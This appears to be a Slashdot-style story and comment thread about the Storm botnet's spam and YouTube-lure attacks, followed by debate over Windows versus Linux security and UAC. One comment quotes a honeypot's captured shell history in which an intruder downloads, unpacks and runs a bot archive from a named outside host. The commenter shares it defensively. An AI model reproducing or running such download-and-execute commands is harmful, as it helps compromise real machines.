Storm Botnet Is Behind Two New Attacks

We've gotten a number of submissions about the new tricks the massive Storm botnet has been up to. Estimates of the size of this botnet range from 250K-1M to 5M-10M compromised machines. Reader cottagetrees notes a writeup at Exploit Prevention Labs on a new social engineering attack involving YouTube. The emails, which may be targeted at people who use private domain registrations, warn the recipient that their "face is all over 'net" on a YouTube video. The link is to a Storm-infected bot that attacks using the Q4Rollup exploit (a package of about a dozen encrypted exploits). And reader thefickler writes that the recent wave of "confirmation spam" is also due to Storm, as was the earlier, months-long "e-card from a friend" series of attack emails.

I had a 500% increase in Spam on Tuesday Last Week

[Jennifer York]

I wonder if the huge spike in spam from Tuesday is at all related to this botnet... It was crushing, we had so many users complaining about slow mail service, and it was traced back to a maxed out mail server diligently blocking the spam. The storm passed by Wednesday, but it did so us that we need to upgrade our infrastructure.

I fscking hate SPAM!

Interesting Question

[spikedvodka]

This whole scenario brings up a rather interesting question: Is this a Spam problem, or a virus problem?

From my understanding there is no viral content in the message, so your virus scanner would have no reason to block the message. A Spam filtering company could well "pass the buck" and say that this is a virus problem, yes it's going to trigger on some spam rules, but "Where it's a virus problem, why create special rules for it"

I can see this type of attack becoming more popular in the future, at least until this question is solved.

Re:Ha!

[cp.tar]

Well, one point in favour of Linux security is the central software repository for each and every distro.

Linux users typically will not - even when the popularity of Linux rises - install random cursors, free smilies and whatnot - simply because they'll be used to installing things from the repository.

And it's quite simple to hammer that into people's heads: the software from the repository is safe. Other software is not.

There is still nothing similar in the Windows world.

It's not just windows they're exploiting...

[nick13245]

For instance, here's a recent attack to my honeypot (Running Slackware Linux)

root@zomg:~# cat /home/webmaster/. ./ .bash_history .ssh/ ../ .screenrc .xsession
root@zomg:~# cat /home/webmaster/.bash_history
ssh localhost
w
cat /etc/hosts
cat /proc/cpuinfo
passwd
cd /var/tmp
ks
l
sl
ls
ls- all
ls -all
mkdir " "
cd " "
clear
wget imaginez0r.xhost.ro/botme.tar.gz
tar zxvf botme.tar.gz
rm -rf botme.tar.gz
cd .bot/
PATH=.:$PATH
bash

These kind of attacks happen every day, sometimes more than once a day. If you don't patch and secure your machine, or do stupid things like download and run binaries, it's gonna get owned. Doesn't matter what OS you run.

Re:It's not just windows they're exploiting...

[MarkRose]

Interestingly enough, imaginez0r.xhost.ro/botme.tar.gz is still available for download. Looks like the bot is controlled by IRC.

Re:Ha!

[Anonymous Coward]

if you do no work to insure your OS is as tight as necessary, regardless of what that OS is, you will leave yourself open to being improperly utilized as a system.

I agree.

Up until March of this year, my main box was running Windows 2000. I had no infections, no rootkits, nothing. I had no crashes, no BSODs, nothing. I was connected to the net from the second day I built the machine. I ran that machine for five years. Never had to reformat. I used it regularly and with a variety of games and software.

This was due to me making sure I learned what I was doing when I first decided to install 2k instead of XP. I have books on securing 2K, I turned off many things that did not need to run. I set up the machine pretty nicely, but I still worried. The machine was behind a NAT'd router/firewall, but I still worried. I worried less the day I stopped using IE and started using Firefox, but I still kept vigilant.

Last year I started installing Linux on my computers. I did not install it until March of this year on my main system. My main system now runs Debian Etch.

Am I more secure now than I was in February? No. The major difference is that my OS will be kept up to date by the folks at Debian for quite awhile, unlike having my system hit "end of life" like MS did with my 2k install. A few minor differences is that I had less tuning to make sure my machine was safe, as Etch is a bit more secure than Windows is upon install. Plus a difference that weight between major and minor is the dedication of the folks creating the Open Source software that the dedicated people working on Debian go over before putting it into the stable repositories.

Am I complacent? No. Do I still check everything I need to and then some? Yes. Is it worth it to be this vigilant? To me, yes. In addition to this I feel more confident in helping others get through tough problems.

Windows is insecure at install. Linux is insecure with a careless change or improper permissions set. BSD is it's own beast with OpenBSD setting a high mark for security by design.

If you system is hooked up to a network, or it has any type of media port/drive then it is vulnerable to many things, and if it has none of that, it is still vulnerable to someone who can code directly on the machine.

Re:New Global Holiday

[thogard]

Consumer protection laws in most countries require Microsoft to recall their software due to damage its done to innocent 3rd parties yet where in the world did that happen? How about free (or $2) CDs at the local computer shop that will reinstall and patch whatever disks people are likely to have.

Remember grandma with the hacked computer is running software that is owned by Microsoft. She only licensed it and the owner is still to blame.

Re:B.S.

[encoderer]

1. I wasn't bashing Linux or OSX or anything else for being insecure. Well, I suppose you could say I was, but if you do, you'd have to acknowledge that I was bashing them all equally. And I certainly gave them credit for being more secure than Windows (the fence analogy, 9 feet vs 6 feet). As desperately as you want me to be, I'm not a windows fanboy or a microsoft apologist. If I were you could dismiss me. I'm a realist. Just that simple.

2. If you think that UAC is "security by annoyance" than you are not seeing the big picture! As more and more people buy new computers with Vista (which is a predetermined reality. A truly bad OS could hurt MSFT, but not in one product cycle.), anyway, as people buy these computers, and load up their software, you're going to see--I believe--darwin-like natural selection occur. You're going to see Vista-friendly apps "selected" in the wild, making them more popular, which makes them more selected, and a positive feedback loop occurs.

In a roundabout way--in a way much less destructive than your "break compatability" suggestion--the "annoyance" of UAC has driven users to more secure software. It's actually an inspired piece of psychology meeting software. They tried to make users care about security. They've promoted things like running only at the PowerUser level or below, running with aggressive IE security settings, etc. But users just don't care. A computer to them is a tool and nothing more and that's that. They want to just do what they want to do. So by creating UAC prompts for bad-actors and non-secure apps, it aligns the users interest with the interest of us security-minded folks. Not brilliant, but, perhaps, inspired.

3. Only in the beatnik granola eating linux world (sorry for the stereotype) can anyone take seriously your suggestion for just breaking compatibility with every app that today throws a UAC. It's just not REALISTIC. It's not even utopian. It's an under-thought solution that suggests that there's no other way to solve the problem than to throw away BILLIONS AND BILLIONS of dollars worth of labor.

Windows is a powerful brand. But again, most users see a PC as a tool and Windows is maybe like the toolbox. A good toolbox can make your life easier. Your suggestion is to make a toolbox that none of the users existing tools will fit into. But that would cause them to just throw out that toolbox. And they'd keep using the insecure software. What Microsoft is trying to do is point out in an in-your-face way that "the tool you just picked up is not safe to use." Over time, I find it likely that they'll replace their unsafe tools. People deep down WANT to conform, they WANT to meet expectations, they WANT to be responsible. But VERY few would just be cool with throwing out all their tools and never using them and replacing them all at once because their new toolbox said the tools were unsafe and wouldn't let them use them anymore.

4. My point, for reiteration, is REALISM. We have a real problem. It's not just Microsofts problem. It's the entire software industry. Very few companies are concerned with making secure software. In all fairness, this wasn't an issue until the advent of the ubiquitous high speed internet connection, which hit critical mass no more than 7 years ago.

We have to accept that this problem exists. And we have to accept reality:

- Microsoft is not going away. Windows is not going away. Even if Microsoft never sold another copy of windows it would STILL be on hundreds of millions of computers for YEARS and YEARS to come.

- Tens--even hundreds--of billions of dollars of software exists (both in-house and commercial) that relies on Administrator privs or otherwise insecure techniques. All of this software, every last byte, has been the product of an investment. The software isn't going anywhere. Y2K shed a light on the true life expectancy of software. As any software developer will tell you -- myself included -- software is expensive. I can't tell you how many times I've given formal and off-the-cu